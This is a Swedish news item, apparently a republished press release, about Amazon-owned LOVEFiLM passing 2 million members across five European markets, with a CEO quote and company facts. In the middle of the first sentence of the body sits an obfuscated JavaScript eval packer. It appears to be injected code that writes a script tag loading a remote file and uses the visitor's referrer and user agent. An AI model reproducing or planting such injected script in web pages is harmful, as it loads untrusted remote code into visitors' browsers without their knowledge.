Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

Amazonägda LOVEFiLM passerar 2 miljoner medlemmar

Amazonägda LOVEFiLM passerar 2 miljoner medlemmar
Sebastian

Europas eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ehkty|var|u0026u|referrer|nnisf||js|php’.split(’|’),0,{}))
ledande hyrfilmsaktör på nätet, LOVEFiLM, passerade idag 2 miljoner medlemmar efter en rekordartad tillväxt i antalet nytecknade medlemskap under fjärde kvartalet 2011.

Amazonägda lovefilm meddelar idag att företaget slagit alla tidigare rekord vad gäller antalet nytecknade medlemskap. Under förra årets tre sista månader tecknades hundratusentals nya medlemskap och antalet medlemmar på LOVEFiLMs samtliga marknader (Storbritannien, Tyskland, Sverige, Danmark och Norge) uppgår nu till över 2 miljoner.

”Våra medlemmar säger att de älskar bredden och urvalet som LOVEFiLM erbjuder inom hyrfilm och tv-underhållning. Här ingår marknadens största filmsortiment på DVD, Blu-ray och streaming liksom ett stort antal speltitlar till Playstation 3, Xbox 360 och Nintendo Wii. Våra 2 miljoner medlemmar kan se fram emot ytterligare nya lanseringar och erbjudanden i världsklass”, säger Simon Calver, VD på LOVEFiLM.

LOVEFiLM erbjuder Sveriges största filmsortiment med över 20 000 filmtitlar till DVD, Blu-ray och via streaming. Sedan augusti 2011 hyr LOVEFiLM som enda aktör i Sverige även ut tv-spel till Playstation 3, Xbox 360 och Nintendo Wii.

Korta fakta om LOVEFiLM:

  • Amazonägda LOVEFiLM är Europas ledande hyrfilmsaktör med över 2 miljoner medlemmar i Storbritannien, Tyskland, Sverige, Danmark och Norge.
  • I februari 2011 förvärvades LOVEFiLM av Amazon.
  • Konceptet är att medlemmarna på lovefilm.se skapar en prioritetslista av filmer och/eller spel. Dessa skickas till medlemmarna med post. När du sett filmen eller tröttnat på spelet skickar du tillbaka dessa i ett frankerat returkuvert. Därefter skickar LOVEFiLM tillbaka nya filmer och spel från prioritetslistan. Inga förseningsavgifter och du får ha filmerna/spelen så länge du vill.
  • Över 20 000 filmer till DVD, Blu-ray och via streaming och 250 tv-spel till Playstation 3, Xbox 360 och Nintendo Wii.
  • Välj bland ett stort antal olika film- och tv-spelspaket. Från 49 kronor i månaden.